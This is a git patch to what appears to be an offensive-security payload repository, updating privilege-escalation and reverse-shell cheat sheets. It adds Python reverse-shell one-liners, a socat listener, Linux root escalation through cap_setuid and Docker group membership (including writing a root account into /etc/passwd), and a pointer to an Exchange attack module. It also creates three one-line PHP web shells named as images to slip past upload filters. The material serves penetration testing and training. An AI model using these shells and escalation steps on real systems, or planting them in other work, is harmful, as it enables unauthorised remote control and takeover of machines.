From a58a8113d150460cfa81dc69d63f288c1376982b Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Tue, 26 Feb 2019 17:24:10 +0100
Subject: [PATCH] Linux capabilities - setuid + read / Docker group privesc

---
 .../Active Directory Attack.md                |  4 ++
 .../Linux - Privilege Escalation.md           | 55 ++++++++++++++++++-
 .../Reverse Shell Cheatsheet.md               | 36 ++++++------
 .../Extension PHP/shell.gif?shell.php         |  1 +
 .../Extension PHP/shell.jpg?shell.php         |  1 +
 .../Extension PHP/shell.png?shell.php         |  1 +
 6 files changed, 75 insertions(+), 23 deletions(-)
 create mode 100644 Upload insecure files/Extension PHP/shell.gif?shell.php
 create mode 100644 Upload insecure files/Extension PHP/shell.jpg?shell.php
 create mode 100644 Upload insecure files/Extension PHP/shell.png?shell.php

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index f29af93..d0b24d9 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -493,6 +493,10 @@ You need a shell on a user account with a mailbox.
     python secretsdump.py xxxxxxxxxx -just-dc
     ```
 
+Alternatively you can use the Metasploit module 
+
+[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
+
 ## Privilege Escalation
 
 ### PrivEsc Local Admin - Token Impersonation (RottenPotato)
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index 96108d5..f600d49 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -10,6 +10,15 @@
 - [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
 - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
 
+## Summary
+
+* [Checklist](#checklist)
+* [SUID](#suid)
+* [Capabilities](#capabilities)
+* [SUDO](#sudo)
+* [Groups](#groups)
+    * [Docker](#docker)
+
 ## Checklists
 
 * Kernel and distribution release details
@@ -111,7 +120,7 @@ sudo chmod +s /tmp/suid # setuid bit
 ```
 
 
-## Capabilies
+## Capabilities
 
 List capabilities of binaries 
 ```bash
@@ -126,12 +135,29 @@ List capabilities of binaries
 /usr/bin/rcp                  = cap_net_bind_service+ep
 ```
 
-Edit capabilites
+Edit capabilities
 ```powershell
 /sbin/setcap -r /bin/ping      # remove
 setcap cap_net_raw+p /bin/ping # add
 ```
 
+Interesting capabilities
+
+```powershell
+cap_dac_read_search # read anything
+cap_setuid+ep # setuid
+```
+
+Example of privilege escalation with `cap_setuid+ep`
+
+```powershell
+$ sudo setcap cap_setuid+ep /usr/bin/python2.7
+
+$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
+sh-5.0# id
+uid=0(root) gid=1000(swissky)
+```
+
 ## SUDO
 
 Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
@@ -178,7 +204,30 @@ $> docker run -it --rm -v $PWD:/mnt bash
 $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
 ```
 
+Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
+
+```powershell
+$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
+latest: Pulling from chrisfosterelli/rootplease
+2de59b831a23: Pull complete 
+354c3661655e: Pull complete 
+91930878a2d7: Pull complete 
+a3ed95caeb02: Pull complete 
+489b110c54dc: Pull complete 
+Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
+Status: Downloaded newer image for chrisfosterelli/rootplease:latest
+
+You should now have a root shell on the host OS
+Press Ctrl-D to exit the docker instance / shell
+
+sh-5.0# id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+
 
 ## References
 
-- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
\ No newline at end of file
+- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
+- [Privilege escalation via Docker - April 22, 2015 — Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
+- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
\ No newline at end of file
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index ec33326..1a95f08 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -36,6 +36,11 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
 
 Linux only
 
+IPv4
+```python
+export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
+```
+
 IPv4
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
@@ -186,20 +191,6 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
 
 ## Spawn TTY
 
-```bash
-/bin/sh -i
-```
-
-(From an interpreter)
-
-```powershell
-python -c 'import pty; pty.spawn("/bin/sh")'
-perl -e 'exec "/bin/sh";'
-perl: exec "/bin/sh";
-ruby: exec "/bin/sh"
-lua: os.execute('/bin/sh')
-```
-
 Access shortcuts, su, nano and autocomplete in a partially tty shell
 /!\ OhMyZSH might break this trick, a simple `sh` is recommended
 
@@ -216,19 +207,24 @@ export TERM=xterm-256color
 stty rows <num> columns <cols>
 ```
 
-(From within vi)
+or use `socat` binary to get a fully tty reverse shell
 
 ```bash
-:!bash
-:set shell=/bin/bash:shell
+socat file:`tty`,raw,echo=0 tcp-listen:12345
 ```
 
-(From within nmap)
+Spawn a TTY shell from an interpreter
 
-```sh
-!sh
+```powershell
+/bin/sh -i
+python -c 'import pty; pty.spawn("/bin/sh")'
+perl -e 'exec "/bin/sh";'
+perl: exec "/bin/sh";
+ruby: exec "/bin/sh"
+lua: os.execute('/bin/sh')
 ```
 
+
 ## References
 
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
diff --git a/Upload insecure files/Extension PHP/shell.gif?shell.php b/Upload insecure files/Extension PHP/shell.gif?shell.php
new file mode 100644
index 0000000..b1c546e
--- /dev/null
+++ b/Upload insecure files/Extension PHP/shell.gif?shell.php	
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
diff --git a/Upload insecure files/Extension PHP/shell.jpg?shell.php b/Upload insecure files/Extension PHP/shell.jpg?shell.php
new file mode 100644
index 0000000..b1c546e
--- /dev/null
+++ b/Upload insecure files/Extension PHP/shell.jpg?shell.php	
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
diff --git a/Upload insecure files/Extension PHP/shell.png?shell.php b/Upload insecure files/Extension PHP/shell.png?shell.php
new file mode 100644
index 0000000..b1c546e
--- /dev/null
+++ b/Upload insecure files/Extension PHP/shell.png?shell.php	
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>